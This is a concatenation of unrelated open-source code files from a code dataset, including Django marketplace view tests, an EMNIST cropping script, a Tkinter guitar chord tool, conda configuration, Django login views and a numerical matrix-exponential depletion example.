Addon.objects.get(id=592).update(type=amo.ADDON_WEBAPP)\n other = Webapp.objects.get(id=592)\n eq_(list(Webapp.objects.listed().exclude(id=self.webapp.id)), [other])\n\n author = add_addon_author(other, self.webapp)\n doc = self.get_more_pq()('#author-addons')\n eq_(doc.length, 1)\n\n by = doc.find('h2 a')\n eq_(by.attr('href'), author.get_url_path())\n eq_(by.text(), author.name)\n\n test_hovercards(self, doc, [other], src='dp-dl-othersby')\n\n def test_other_apps_no_addons(self):\n \"\"\"An add-on by the same author should not show up.\"\"\"\n other = Addon.objects.get(id=592)\n assert other.type != amo.ADDON_WEBAPP, 'Should not be an app.'\n\n add_addon_author(other, self.webapp)\n eq_(self.get_more_pq()('#author-addons').length, 0)\n\n def test_other_apps_no_unlisted(self):\n \"\"\"An unlisted app by the same author should not show up.\"\"\"\n Addon.objects.get(id=592).update(type=amo.ADDON_WEBAPP,\n disabled_by_user=True)\n other = Webapp.objects.get(id=592)\n\n add_addon_author(other, self.webapp)\n eq_(self.get_more_pq()('#author-addons').length, 0)\n\n def test_other_apps_by_others(self):\n \"\"\"Apps by different/no authors should not show up.\"\"\"\n author = UserProfile.objects.get(pk=999)\n AddonUser.objects.create(addon=self.webapp, user=author, listed=True)\n eq_(self.get_more_pq()('#author-addons').length, 0)\n\n def test_other_apps_none(self):\n eq_(self.get_more_pq()('#author-addons').length, 0)\n\n def test_deleted(self):\n self.webapp.update(status=amo.STATUS_DELETED)\n r = self.client.get(self.url)\n eq_(r.status_code, 404)\n\n def test_disabled_user_message(self):\n self.webapp.update(disabled_by_user=True)\n r = self.client.get(self.url)\n eq_(r.status_code, 404)\n doc = pq(r.content)\n h1 = doc('h1.addon')\n eq_(h1.length, 1)\n eq_(h1.find('a').length, 0)\n assert pq(r.content)('.removed'), (\n 'Expected message indicating that app was removed by its author')\n\n def test_disabled_status_message(self):\n self.webapp.update(status=amo.STATUS_DISABLED)\n r = self.client.get(self.url)\n eq_(r.status_code, 404)\n doc = pq(r.content)\n h1 = doc('h1.addon')\n eq_(h1.length, 1)\n eq_(h1.find('a').length, 0)\n assert pq(r.content)('.disabled'), (\n 'Expected message indicating that app was disabled by administrator')\n\n def test_categories(self):\n c = Category.objects.all()[0]\n c.application = None\n c.type = amo.ADDON_WEBAPP\n c.save()\n AddonCategory.objects.create(addon=self.webapp, category=c)\n links = self.get_more_pq()('#related ul:first').find('a')\n amo.tests.check_links([(unicode(c.name), c.get_url_path())], links)\n\n def test_tags(self):\n t = Tag.objects.create(tag_text='ballin')\n AddonTag.objects.create(tag=t, addon=self.webapp)\n links = self.get_more_pq()('#related #tagbox ul a')\n amo.tests.check_links([(t.tag_text, t.get_url_path())], links,\n verify=False)\n\n\nclass TestMobileListing(amo.tests.MobileTest, WebappTest):\n\n def get_res(self):\n r = self.client.get(reverse('apps.list'))\n eq_(r.status_code, 200)\n return r, pq(r.content)\n\n def test_listing(self):\n r, doc = self.get_res()\n self.assertTemplateUsed(r, 'browse/mobile/extensions.html')\n item = doc('.item')\n eq_(item.length, 1)\n eq_(item.find('h3').text(), 'woo')\n\n def test_listing_downloads(self):\n r, doc = self.get_res()\n dls = doc('.item').find('details .vital.downloads')\n eq_(dls.text().split()[0], numberfmt(self.webapp.weekly_downloads))\n\n\nclass TestMobileLayout(TestMobileHeader):\n fixtures = ['base/users']\n\n def setUp(self):\n self.url = reverse('apps.list')\n\n 
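# Several tests in this file toggle Django settings with mock's patch.object
# as a decorator, which restores the original value when the test returns. A
# stdlib-only sketch of the same mechanism (the Settings class here is a
# stand-in, not Django's settings object):
from unittest.mock import patch

class Settings:
    READ_ONLY = False

settings = Settings()

@patch.object(settings, "READ_ONLY", True)
def check():
    assert settings.READ_ONLY is True

check()
assert settings.READ_ONLY is False  # the patched value is rolled back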
@patch.object(settings, 'APP_PREVIEW', True)\n def test_no_language_selector(self):\n # When Marketplace is localized, remove this test.\n r = self.client.get(self.url)\n eq_(r.status_code, 200)\n eq_(pq(r.content)('#lang_form').length, 0)\n\n def test_language_selector(self):\n r = self.client.get(self.url)\n eq_(r.status_code, 200)\n eq_(pq(r.content)('#lang_form').length, 1)\n\n\nclass TestMobileDetail(amo.tests.MobileTest, WebappTest):\n\n def test_page(self):\n r = self.client.get(self.url)\n eq_(r.status_code, 200)\n self.assertTemplateUsed(r, 'addons/mobile/details.html')\n doc = pq(r.content)\n eq_(doc('title').text(), '%s :: Apps Marketplace' % self.webapp.name)\n eq_(doc('h3').text(), unicode(self.webapp.name))\n\n def test_downloads(self):\n doc = pq(self.client.get(self.url).content)('table')\n eq_(doc('.adu').length, 0)\n eq_(doc('.downloads td').text(),\n numberfmt(self.webapp.weekly_downloads))\n self.webapp.update(weekly_downloads=0)\n doc = pq(self.client.get(self.url).content)('table')\n eq_(doc('.downloads').length, 0)\n\n def test_no_release_notes(self):\n r = self.client.get(self.url)\n eq_(pq(r.content)('.versions').length, 0)\n\n\nclass TestSharing(WebappTest):\n\n def test_redirect_sharing(self):\n r = self.client.get(reverse('apps.share', args=['yeah']),\n {'service': 'delicious'})\n d = {\n 'title': page_title({'request': r}, self.webapp.name,\n force_webapps=True),\n 'description': truncate(self.webapp.summary, length=250),\n 'url': absolutify(self.webapp.get_url_path()),\n }\n url = iri_to_uri(get_service('delicious').url.format(**d))\n self.assertRedirects(r, url, status_code=302, target_status_code=301)\n\n\nclass TestReportAbuse(WebappTest):\n\n def setUp(self):\n super(TestReportAbuse, self).setUp()\n self.abuse_url = reverse('apps.abuse', args=[self.webapp.app_slug])\n\n def test_page(self):\n r = self.client.get(self.abuse_url)\n eq_(r.status_code, 200)\n doc = pq(r.content)\n eq_(doc('title').text(), 'Report abuse for woo :: Apps Marketplace')\n expected = [\n ('Apps Marketplace', reverse('apps.home')),\n ('Apps', reverse('apps.list')),\n (unicode(self.webapp.name), self.url),\n ]\n amo.tests.check_links(expected, doc('#breadcrumbs a'))\n\n\n@patch.object(settings, 'WEBAPPS_RECEIPT_KEY', amo.tests.AMOPaths.sample_key())\nclass TestInstall(amo.tests.TestCase):\n fixtures = ['base/users']\n\n def setUp(self):\n self.addon = Addon.objects.create(type=amo.ADDON_WEBAPP)\n self.addon.update(app_slug=self.addon.pk,\n manifest_url='http://cbc.ca/manifest')\n self.user = UserProfile.objects.get(email='regular@mozilla.com')\n self.url = reverse('apps.record', args=[self.addon.app_slug])\n assert self.client.login(username='regular@mozilla.com',\n password='password')\n\n def test_not_record_addon(self):\n self.addon.update(type=amo.ADDON_EXTENSION)\n self.client.post(self.url)\n eq_(self.user.installed_set.count(), 0)\n\n def test_record_logged_out(self):\n self.client.logout()\n res = self.client.post(self.url)\n eq_(res.status_code, 302)\n\n def test_record_install(self):\n res = self.client.post(self.url)\n eq_(res.status_code, 200)\n eq_(self.user.installed_set.count(), 1)\n\n def test_record_multiple_installs(self):\n self.client.post(self.url)\n res = self.client.post(self.url)\n eq_(res.status_code, 200)\n eq_(self.user.installed_set.count(), 1)\n\n @patch.object(settings, 'WEBAPPS_RECEIPT_KEY',\n amo.tests.AMOPaths.sample_key())\n def test_record_receipt(self):\n res = self.client.post(self.url)\n content = json.loads(res.content)\n assert 
content.get('receipt'), content\n","sub_path":"apps/webapps/tests/test_views.py","file_name":"test_views.py","file_ext":"py","file_size_in_byte":17937,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"402977903","text":"import scipy.io as sc\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport cv2\n\n\n# Crop the images by 14 px and then resize them back to standard dimensions.\n# Finally store the resized image into a common array\ndef crop(data, dim):\n # Array to store the cropped images\n cropped_non_chars_images_array = []\n\n for i in range(data.shape[0]):\n # Just to keep track of the iteration\n # print(i)\n\n # Reshape the flattened image data into the standard dimensions\n # and then store the transpose because after unflattening them\n # the images had horizontal orientation.\n img = data[i].reshape(dim).T\n\n # The 14 column pixels to crop are generated randomly\n pixels_to_crop = np.random.randint(0, 27, size=14)\n\n # Only those 14 pixels are selected to crop the image\n img = img[:, pixels_to_crop]\n\n # And then the image is resized into the standard dimensions\n img = cv2.resize(img, dim, interpolation=cv2.INTER_CUBIC)\n\n # Finally, each individual cropped image is appended to the array\n cropped_non_chars_images_array.append(img)\n\n return np.asarray(cropped_non_chars_images_array).reshape((-1, 784))\n\n\ndef main():\n # Load the images\n data = sc.loadmat(\"matlab/emnist-byclass.mat\")['dataset']\n\n # Standard dimension of the images\n dimensions = (28, 28)\n\n # Get the training data\n train_data = data[0][0][0][0][0][0]\n\n # Get the testing data\n test_data = data[0][0][1][0][0][0]\n\n print(\"Will start cropping the train data\")\n # Preprocessing on training images\n # and save the non-char images in the below array\n train_non_chars_imgs_arr = crop(train_data, dimensions)\n\n train_data_combined = np.vstack((train_non_chars_imgs_arr, train_data))\n\n train_imgs_labels = np.vstack((np.zeros((train_data.shape[0], 1)), np.ones((train_data.shape[0], 1))))\n\n # Preprocessing on testing images\n # and save the non-char images in the below array\n print(\"Now will start cropping the test data\")\n test_non_chars_imgs_arr = crop(test_data, dimensions)\n test_data_combined = np.vstack((test_non_chars_imgs_arr, test_data))\n test_imgs_labels = np.vstack((np.zeros((test_data.shape[0], 1)), np.ones((test_data.shape[0], 1))))\n # Save both the arrays into a compressed numpy file\n print(\"Last step....Saving the files\")\n np.savez_compressed(\"./cropped_non_chars_imgs\",\n shape_of_data=dimensions,\n train=train_data_combined,\n test=test_data_combined,\n train_label=train_imgs_labels,\n test_label=test_imgs_labels)\n\n\nif __name__ == '__main__':\n main()","sub_path":"Preprocessing.py","file_name":"Preprocessing.py","file_ext":"py","file_size_in_byte":2716,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"319089763","text":"#! 
python3.5 # -*- coding: utf-8 -*-\r\nimport sys\r\nimport Guitare\r\n\r\nif sys.version[:1] == '3':\r\n import tkinter as TK\r\n \r\nelse:\r\n import Tkinter as TK\r\n\r\nclass GUIAccordGenerator(object):\r\n def __init__(self, master,generator):\r\n self.master = master\r\n self.generator = generator\r\n #self.master.geometry(\"800x600\")\r\n \r\n self.master.title(\"Generateur d'accords\")\r\n self.variation = 1\r\n self.accordStr = TK.StringVar()\r\n self.accordsLst=[]\r\n self.MasterFrame = TK.Frame(master)\r\n self.MasterFrame.pack()\r\n self.FrameLst = TK.LabelFrame(self.MasterFrame,text=\"Liste des notes : \",padx=5,pady=5)\r\n self.FrameLst.pack(side=TK.LEFT,padx=10)\r\n\r\n self.FrameMode = TK.LabelFrame(self.MasterFrame,text=\"Accords disponibles : \",padx=5,pady=5)\r\n self.FrameMode.pack(side=TK.LEFT,padx=10,pady=10)\r\n\r\n self.lst = TK.Listbox(self.FrameLst,height=12)\r\n self.lst.pack()\r\n\r\n #Insertion des elements dans la liste \r\n for item in self.generator.chromatique:\r\n self.lst.insert(TK.END,item)\r\n \r\n self.typesAccord = ['majeur','mineur','sus2','sus4','7','Maj7','m7',\r\n 'mMaj7','Maj7aug','Maj7b5','7b5','aug7','aug','b5',\r\n 'dim','add9','5']\r\n self.coordy=[[1,16],[2,39],[3,60],[4,83],[5,105],[6,127]]\r\n self.coordx=[5,28, 68, 112, 153, 195, 238, 281, 324, 367, 410,\r\n 452, 494, 536, 580, 622, 664, 700]\r\n self.mode = TK.StringVar()\r\n \r\n self.mode.set('majeur')\r\n \r\n for txtType in self.typesAccord:\r\n TK.Radiobutton(self.FrameMode,text=txtType,variable=self.mode,value=txtType,anchor=TK.W,width=25,indicatoron=0,command=self.getrButton).pack()\r\n\r\n \r\n \r\n \r\n self.FrameAccord=TK.Frame(self.MasterFrame, padx=5,pady=5)\r\n self.FrameAccord.pack(padx=10,pady=10)\r\n\r\n self.lst.bind('<ButtonRelease-1>',self.getList)\r\n self.lst.bind('<Double-Button-1>',self.lstAddNote)\r\n self.lst.bind('<Return>',self.getChordTxt)\r\n self.lblAccord=TK.Label(self.FrameAccord,textvariable = self.accordStr)\r\n \r\n self.lblAccord.pack()\r\n\r\n self.FrameBtn = TK.Frame(self.MasterFrame,height=5,width=5)\r\n self.FrameBtn.pack()\r\n _mode = TK.StringVar()\r\n _mode.set('twoway')\r\n self.btnPlay = TK.Button(self.FrameBtn,text=\"Jouer l'accord\",command= lambda:self.generator.playNotes(self.accordsLst,_mode.get()))\r\n self.btnPlay.pack()\r\n \r\n self.chk = TK.Checkbutton(self.FrameBtn,onvalue='twoway',offvalue='oneway',variable=_mode,text=\"Lire dans les deux sens\")\r\n self.chk.pack()\r\n\r\n self.FrameChord = TK.LabelFrame(self.MasterFrame,text=\"Chord retreiver\",padx=5,pady=5)\r\n self.FrameChord.pack(padx=10)\r\n self.lstChordStr = TK.StringVar()\r\n self.lstChordStr.set(\"Entrer une suite de notes\")\r\n self.txtEntry= TK.Entry(self.FrameChord,textvariable=self.lstChordStr,width=25)\r\n self.txtEntry.pack()\r\n self.txtEntry.bind(\"<Return>\",self.getChordTxt)\r\n TK.Label(self.FrameChord,text=\"Transposer en demi ton (capo guitare)\").pack()\r\n self.capo = TK.IntVar()\r\n self.spinbx = TK.Spinbox(self.FrameChord,from_=-12,to=12,textvariable=self.capo,command=self.setCapo)\r\n self.spinbx.pack()\r\n self.spinbx.bind(\"<Return>\",self.setCapo)\r\n self.FrameManche = TK.LabelFrame(master,text=\"Représentation graphique de l'accord\")\r\n self.FrameManche.pack(side=TK.BOTTOM, fill=TK.BOTH,expand=1)\r\n \r\n self.img = TK.PhotoImage(file='images/manche_guitareLittle.gif')\r\n self.canvaManche = TK.Canvas(self.FrameManche,height=150,width=715)\r\n self.canvaManche.pack()\r\n \r\n #TK.Button(master,text='btn',command=self.clic).pack()\r\n 
self.canvaManche.create_image(0,0,image=self.img,anchor=TK.NW)\r\n #self.cercle(28,16)\r\n self.canvaManche.bind(\"<Button-1>\",self.cercle)\r\n self.canvaManche.bind(\"<Button-3>\",self.delLastCircle)\r\n\r\n #def clic(self):\r\n \r\n \r\n # if self.variation>len(self.generator.ChordPatterns)-1:\r\n # self.variation=0\r\n # idx = self.lst.curselection()\r\n # result = self.lst.get(idx)\r\n # self.getCoordinates(result,self.mode.get(),self.variation) \r\n # self.variation+=1\r\n\r\n def cercle(self,event,x=0,y=0):\r\n \"Dessine un cercle sur le mache de guitare\"\r\n def getNoteFromCoordinates(x,y):\r\n \"Retourne une note en fonction des coordonnées sur l'image/manche\"\r\n numCorde = 0\r\n note=None\r\n for corde,_y in self.coordy:\r\n if _y == y:\r\n numCorde=corde\r\n break\r\n \r\n for _x in self.coordx:\r\n if x==_x:\r\n idx = self.coordx.index(_x)\r\n note = self.generator.FretManche[corde-1][1][idx]\r\n break\r\n if self.lstChordStr.get()==\"Entrer une suite de notes\":\r\n self.lstChordStr.set(note + \" \")\r\n else:\r\n self.lstChordStr.set(self.lstChordStr.get() + note + \" \")\r\n \r\n\r\n\r\n\r\n if event !=None:\r\n x=event.x\r\n y=event.y\r\n\r\n \r\n r=5\r\n \r\n #Recupération de la valeur la plus proche des coordonnées pour avoir les points au bon endroit\r\n lsty=[]\r\n lstx=[]\r\n for _corde,_y in self.coordy:\r\n diff = _y - y\r\n if diff<0:diff=diff*-1\r\n lsty.append(diff)\r\n lstyCp = lsty[:]\r\n lstyCp.sort()\r\n idxY = lsty.index(lstyCp[0])\r\n y = self.coordy[idxY][1]\r\n for _x in self.coordx:\r\n diff = _x - x\r\n if diff<0:diff=diff*-1\r\n lstx.append(diff)\r\n lstxCp = lstx[:]\r\n lstxCp.sort()\r\n idxX = lstx.index(lstxCp[0])\r\n x = self.coordx[idxX]\r\n\r\n\r\n \"tracé d'un cercle de centre (x,y) et de rayon r\"\r\n if x==5:#Si la note est la corde à vide\r\n _color=None\r\n else:\r\n _color='red'\r\n self.canvaManche.create_oval(x-r, y-r, x+r, y+r, outline='black',fill=_color)\r\n\r\n getNoteFromCoordinates(x,y)\r\n\r\n def delLastCircle(self,event):\r\n if len(self.canvaManche.find_all())>1:\r\n item = self.canvaManche.find_all()[-1]\r\n self.canvaManche.delete(item)\r\n\r\n def setCapo(self,event=None):\r\n _capo = self.capo.get()\r\n _lstChordStr = self.txtEntry.get()\r\n \r\n _capoized = []\r\n sensAlteration=''\r\n if _lstChordStr !=\"Entrer une suite de notes\" and _lstChordStr !='':\r\n lstNotes = list(_lstChordStr.split())\r\n \r\n \r\n if _capo>0 : \r\n \r\n sensAlteration=\"plus\"\r\n if event is None:\r\n _capo =_capo - (_capo-1)\r\n else:\r\n sensAlteration=\"moins\"\r\n if event is None:\r\n _capo = _capo - (_capo+1)\r\n for note in lstNotes:\r\n _capoized.append(self.generator.alterer(note,sensAlteration,_capo))\r\n if event != None:\r\n self.capo.set(0)\r\n self.lstChordStr.set(_capoized)\r\n\r\n def getChordTxt(self,event):\r\n lstStr = self.txtEntry.get()\r\n lstStr=lstStr.split()\r\n lstStr=list(set(lstStr))\r\n self.accordStr.set(self.generator.getChord(lstStr))\r\n\r\n def getList(self,event):\r\n \r\n idx = self.lst.curselection()\r\n result = self.lst.get(idx)\r\n self.accordsLst=self.generator.accord(result,self.mode.get())\r\n self.accordStr.set(self.accordsLst)\r\n \r\n def getrButton(self):\r\n if self.lst.curselection():\r\n \r\n result =self.lst.get(self.lst.curselection())\r\n self.accordsLst=self.generator.accord(result,self.mode.get())\r\n self.accordStr.set(self.accordsLst)\r\n \r\n\r\n def lstAddNote(self,event):\r\n if self.lst.curselection():\r\n result =self.lst.get(self.lst.curselection())\r\n if self.lstChordStr.get() 
== \"Entrer une suite de notes\":\r\n self.lstChordStr.set(result + \" \")\r\n else:\r\n self.lstChordStr.set(self.lstChordStr.get() + result + \" \")\r\n \r\n\r\nroot = TK.Tk()\r\ngenerator = Guitare.Guitare()\r\nGUIAccordGenerator(root,generator)\r\nroot.mainloop()\r\n ","sub_path":"GUIAccordGenerator.py","file_name":"GUIAccordGenerator.py","file_ext":"py","file_size_in_byte":8604,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"327875887","text":"# Copyright (c) 2013, Web Notes Technologies Pvt. Ltd. and Contributors\n# MIT License. See license.txt \n\nimport webnotes\nimport webnotes.utils, markdown2\n\nfrom webnotes import _\n\n@webnotes.whitelist(allow_guest=True)\ndef add_comment(args=None):\n\t\"\"\"\n\t\targs = {\n\t\t\t'comment': '',\n\t\t\t'comment_by': '',\n\t\t\t'comment_by_fullname': '',\n\t\t\t'comment_doctype': '',\n\t\t\t'comment_docname': '',\n\t\t\t'page_name': '',\n\t\t}\n\t\"\"\"\n\t\n\tif not args: \n\t\targs = webnotes.local.form_dict\n\targs['doctype'] = \"Comment\"\n\n\tpage_name = args.get(\"page_name\")\n\tif \"page_name\" in args:\n\t\tdel args[\"page_name\"]\n\tif \"cmd\" in args:\n\t\tdel args[\"cmd\"]\n\n\tcomment = webnotes.bean(args)\n\tcomment.ignore_permissions = True\n\tcomment.insert()\n\t\n\t# since comments are embedded in the page, clear the web cache\n\twebnotes.webutils.clear_cache(page_name)\n\n\t# notify commentors \n\tcommentors = [d[0] for d in webnotes.conn.sql(\"\"\"select comment_by from tabComment where\n\t\tcomment_doctype=%s and comment_docname=%s and\n\t\tifnull(unsubscribed, 0)=0\"\"\", (comment.doc.comment_doctype, comment.doc.comment_docname))]\n\t\n\towner = webnotes.conn.get_value(comment.doc.comment_doctype, comment.doc.comment_docname, \"owner\")\n\t\n\tfrom webnotes.utils.email_lib.bulk import send\n\tsend(recipients=list(set(commentors + [owner])), \n\t\tdoctype='Comment', \n\t\temail_field='comment_by', \n\t\tsubject='New Comment on %s: %s' % (comment.doc.comment_doctype, \n\t\t\tcomment.doc.title or comment.doc.comment_docname), \n\t\tmessage='%(comment)s<p>By %(comment_by_fullname)s</p>' % args,\n\t\tref_doctype=comment.doc.comment_doctype, ref_docname=comment.doc.comment_docname)\n\t\n\ttemplate = webnotes.get_template(\"templates/includes/comment.html\")\n\t\n\treturn template.render({\"comment\": comment.doc.fields})\n\t","sub_path":"webnotes/templates/includes/comments.py","file_name":"comments.py","file_ext":"py","file_size_in_byte":1716,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"131976547","text":"from .Declaration import Declaration\nfrom .Location import Location\nfrom .Transition import Transition\nimport xml.dom.minidom as dom\n\n\nclass Template(object):\n def __init__(self, name: str):\n self.name = name\n self.initial_location = ''\n self.locations = []\n self.transitions = []\n self.declarations = Declaration()\n return\n\n def set_initial_location(self, id: int):\n self.initial_location = 'id' + str(id)\n return\n\n def add_location(self, name: str, id: int):\n location = Location(name, id)\n self.locations.append(location)\n return location\n\n def add_transition(self, source: int, target: int):\n transition = Transition(source, target)\n self.transitions.append(transition)\n return transition\n\n def add_variable_declaration(self, type: int, name: str, value: str):\n return self.declarations.add_variable(type, name, value)\n\n def add_function_declaration(self, type: int, name: str, param: 
str, code: str):\n return self.declarations.add_function(type, name, param, code)\n\n def writer(self, doc: dom.Document):\n node = doc.createElement('template')\n name = doc.createElement('name')\n name.appendChild(doc.createTextNode(self.name))\n node.appendChild(name)\n\n node.appendChild(self.declarations.writer(doc))\n\n for location in self.locations:\n node.appendChild(location.writer(doc))\n\n init = doc.createElement('init')\n init.setAttribute('ref', self.initial_location)\n node.appendChild(init)\n\n for transition in self.transitions:\n node.appendChild(transition.writer(doc))\n doc.appendChild(node)\n return node\n","sub_path":"uppaal/Template.py","file_name":"Template.py","file_ext":"py","file_size_in_byte":1741,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"171944939","text":"# (c) 2012-2015 Continuum Analytics, Inc. / http://continuum.io\n# All Rights Reserved\n#\n# conda is distributed under the terms of the BSD 3-clause license.\n# Consult LICENSE.txt or http://opensource.org/licenses/BSD-3-Clause.\nfrom __future__ import print_function, division, absolute_import, unicode_literals\n\nimport os\nimport sys\nfrom os.path import abspath, expanduser, isfile, join\n\nfrom .base.context import context, non_x86_linux_machines\nnon_x86_linux_machines = non_x86_linux_machines\n\n\n# ----- rc file -----\n\n# This is used by conda config to check which keys are allowed in the config\n# file. Be sure to update it when new keys are added.\n\n#################################################################\n# Also update the example condarc file when you add a key here! #\n#################################################################\n\nrc_list_keys = [\n 'channels',\n 'disallow',\n 'create_default_packages',\n 'track_features',\n 'envs_dirs',\n 'pkgs_dirs',\n 'default_channels',\n 'pinned_packages',\n]\n\nrc_bool_keys = [\n 'add_binstar_token',\n 'add_anaconda_token',\n 'add_pip_as_python_dependency',\n 'always_yes',\n 'always_copy',\n 'allow_softlinks',\n 'always_softlink',\n 'auto_update_conda',\n 'changeps1',\n 'use_pip',\n 'offline',\n 'binstar_upload',\n 'anaconda_upload',\n 'show_channel_urls',\n 'allow_other_channels',\n 'update_dependencies',\n 'channel_priority',\n 'shortcuts',\n]\n\nrc_string_keys = [\n 'channel_alias',\n 'client_ssl_cert',\n 'client_ssl_cert_key',\n 'default_python',\n]\n\n# Not supported by conda config yet\nrc_other = [\n 'proxy_servers',\n]\n\nroot_dir = context.root_prefix\nroot_writable = context.root_writable\n\nuser_rc_path = abspath(expanduser('~/.condarc'))\nsys_rc_path = join(sys.prefix, '.condarc')\n\n\nget_rc_urls = lambda: context.channels\n\n\ndef get_local_urls():\n from .models.channel import get_conda_build_local_url\n return get_conda_build_local_url() or []\n\n\nclass RC(object):\n\n def get(self, key, default=None):\n key = key.replace('-', '_')\n return getattr(context, key, default)\n\n\nrc = RC()\nenvs_dirs = context.envs_dirs\n\n\ndef get_rc_path():\n path = os.getenv('CONDARC')\n if path == ' ':\n return None\n if path:\n return path\n for path in user_rc_path, sys_rc_path:\n if isfile(path):\n return path\n return None\n\n\nrc_path = get_rc_path()\n\npkgs_dirs = list(context.pkgs_dirs)\ndefault_prefix = context.default_prefix\nsubdir = context.subdir\narch_name = context.arch_name\nbits = context.bits\nplatform = context.platform\n\n# put back because of conda build\ndefault_python = context.default_python\nbinstar_upload = 
context.anaconda_upload\n","sub_path":"python/pyenv.symlink/versions/miniconda3-4.3.11/lib/python3.6/site-packages/conda/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":2718,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"179757514","text":"from django.shortcuts import render, redirect\nfrom django.http import HttpResponse\nfrom django.contrib.auth import authenticate, login, logout\nfrom django.contrib import messages\nfrom django.urls import reverse\n\nfrom osoby.models import Absolwent\nfrom osoby.forms import UserLoginForm, UserCreateForm, UserEditForm\nfrom django.contrib.auth.decorators import login_required\n\n# from django.contrib.auth.forms import UserCreationForm\n\ndef index(request):\n return HttpResponse(\"<h1>Witaj w Django!</h1>\")\n\ndef lista_osob(request):\n osoby = Absolwent.objects.all()\n kontekst = {'osoby': osoby}\n return render(request, 'osoby/lista_osob2.html', kontekst)\n\n\ndef loguj_osobe(request):\n if request.method == 'POST':\n form = UserLoginForm(request.POST)\n if form.is_valid():\n # print(form.cleaned_data)\n nazwa = form.cleaned_data['nazwa']\n haslo = form.cleaned_data['haslo']\n user = authenticate(request, username=nazwa, password=haslo)\n if user is not None:\n login(request, user)\n messages.success(request, \"Zostałeś zalogowany!\")\n return redirect(reverse('osoby:lista'))\n else:\n messages.error(request, \"Błędny login lub hasło!\")\n else:\n form = UserLoginForm()\n kontekst = {'form': form}\n return render(request, 'osoby/loguj_osobe.html', kontekst)\n\n\ndef wyloguj_osobe(request):\n logout(request)\n messages.info(request, \"Zostałeś wylogowany!\")\n return redirect(reverse('osoby:lista'))\n\n\ndef rejestruj_osobe(request):\n if request.method == 'POST':\n form = UserCreateForm(request.POST)\n if form.is_valid():\n form.save()\n messages.success(request, \"Utworzono konto! 
Możesz się zalogować!\")\n return redirect(reverse('osoby:loguj-osobe'))\n else:\n form = UserCreateForm()\n kontekst = {'form': form}\n return render(request, 'osoby/rejestruj_osobe1.html', kontekst)\n\n\n@login_required()\ndef edytuj_osobe(request):\n try:\n a = Absolwent.objects.filter(user=request.user).first()\n except Absolwent.DoesNotExist:\n a = 0\n # print(a)\n if request.method == 'POST':\n form = UserEditForm(instance=request.user, data=request.POST)\n if form.is_valid():\n # print(form.cleaned_data['klasa'])\n if a:\n a.klasa = form.cleaned_data['klasa']\n a.save()\n else:\n a = Absolwent.objects.create(user=request.user, klasa=form.cleaned_data['klasa'])\n form.save()\n messages.success(request, \"Zaktualizowano dane użytkownika!\")\n return redirect(reverse('osoby:lista'))\n else:\n if a:\n a = a.klasa.id\n form = UserEditForm(instance=request.user, initial={'klasa':a})\n return render(request, 'osoby/edytuj_osobe1.html', {'form': form})","sub_path":"osoby/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2923,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"397243947","text":"\n# coding: utf-8\n\n## Approximation to Exponential Using Parabolic Contour\n\n# In[93]:\n\nimport numpy as np\nimport scipy as sp\nimport scipy.sparse as sparse\nimport scipy.sparse.linalg as splinalg\nimport matplotlib.pyplot as plt\n\n#compute exp\nNpoints = (2,4,6,8,10,12,14,16,18,20,22,24,26,28,30,32)\nerrors = np.zeros(len(Npoints))\npos = 0\nfor N in Npoints:\n theta = np.pi*np.arange(1,N,2)/N\n z = N*(.1309 - 0.1194*theta**2 + .2500j*theta)\n w = N*(- 2*0.1194*theta + .2500j)\n c = 1.0j/N*np.exp(z)*w\n plt.plot(np.real(z),np.imag(z),'o-')\n u = 0\n for k in range(int(N/2)):\n u -= c[k]/((z[k] + 1))\n errors[pos] = np.abs(2*np.real(u)-0.3678794411714423215955238)\n pos += 1\nplt.xlabel(\"Re(z)\")\nplt.ylabel(\"Im(z)\")\nplt.axis([-40,10,0,30])\nplt.savefig(\"6.pdf\");\nplt.close()\nprint(\"Errors =\",errors)\n\n\n\n## Depletion Example\n\n# In[84]:\n\n#cross-sections in barns\nposition = {'28':0,'29':1,'20':2,'39':3,'30':4,'49':5,'40':6,'41':7,'51':8}\nprevious_cap = {'28':-1,'29':0,'20':1,'39':-1,'30':3,'49':-1,'40':5,'41':6,'51':-1}\nprevious_beta = {'28':-1,'29':-1,'20':-1,'39':1,'30':2,'49':3,'40':4,'41':-1,'51':7}\nsig_gamma = 1.0E-24*np.array([2.7,22.0,0,60,274,290,326,532])\nsig_a = 1.0E-24*np.array([12.0,22,0,60,0,274+698,290+53,326+938,535])\nlam = np.array([0,42.4737,1.17982,0.294956,138.629,0,0,0.000131877,0])\n\nA = np.zeros((9,9))\n\nphi = 1.0e14 * 60 * 60 * 24 #10^14 1/cm^2/s in 1/cm^2/day\nfor i in position:\n row = position[i]\n A[row,row] = -lam[row] - phi*sig_a[row]\n if previous_cap[i]>=0:\n A[row,previous_cap[i]] = phi*sig_gamma[previous_cap[i]]\n if previous_beta[i]>=0:\n A[row,previous_beta[i]] = lam[previous_beta[i]]\nplt.spy(A)\nplt.show()\nb = np.zeros(9)\nb[0] = 1.0\n#plt.savefig(\"98.pdf\");\n#plt.close()\n\n\n\n### Example Matrix Exponential\n\n# In[89]:\n\nNpoints = (32,) #(2,4,6,8,10,12,14,16,18,20,22,24,26,28,30,32)\n\nfor N in Npoints:\n pos = 0\n theta = np.pi*np.arange(1,N,2)/N\n z = N*(.1309 - 0.1194*theta**2 + .2500j*theta)\n w = N*(- 2*0.1194*theta + .2500j)\n c = 1.0j/N*np.exp(z)*w\n #plt.plot(np.real(z),np.imag(z),'o-')\n #plt.savefig('hw5.pdf')\n #plt.close()\n u = np.zeros(9)\n for k in range(int(N/2)):\n n,code = splinalg.gmres(z[k]*sparse.identity(9) - A*365,b, tol=1e-12, maxiter=2000)\n if (code):\n print(code)\n u = u- c[k]*n\n u = 2*np.real(u)\n print(u)\n\n\n## 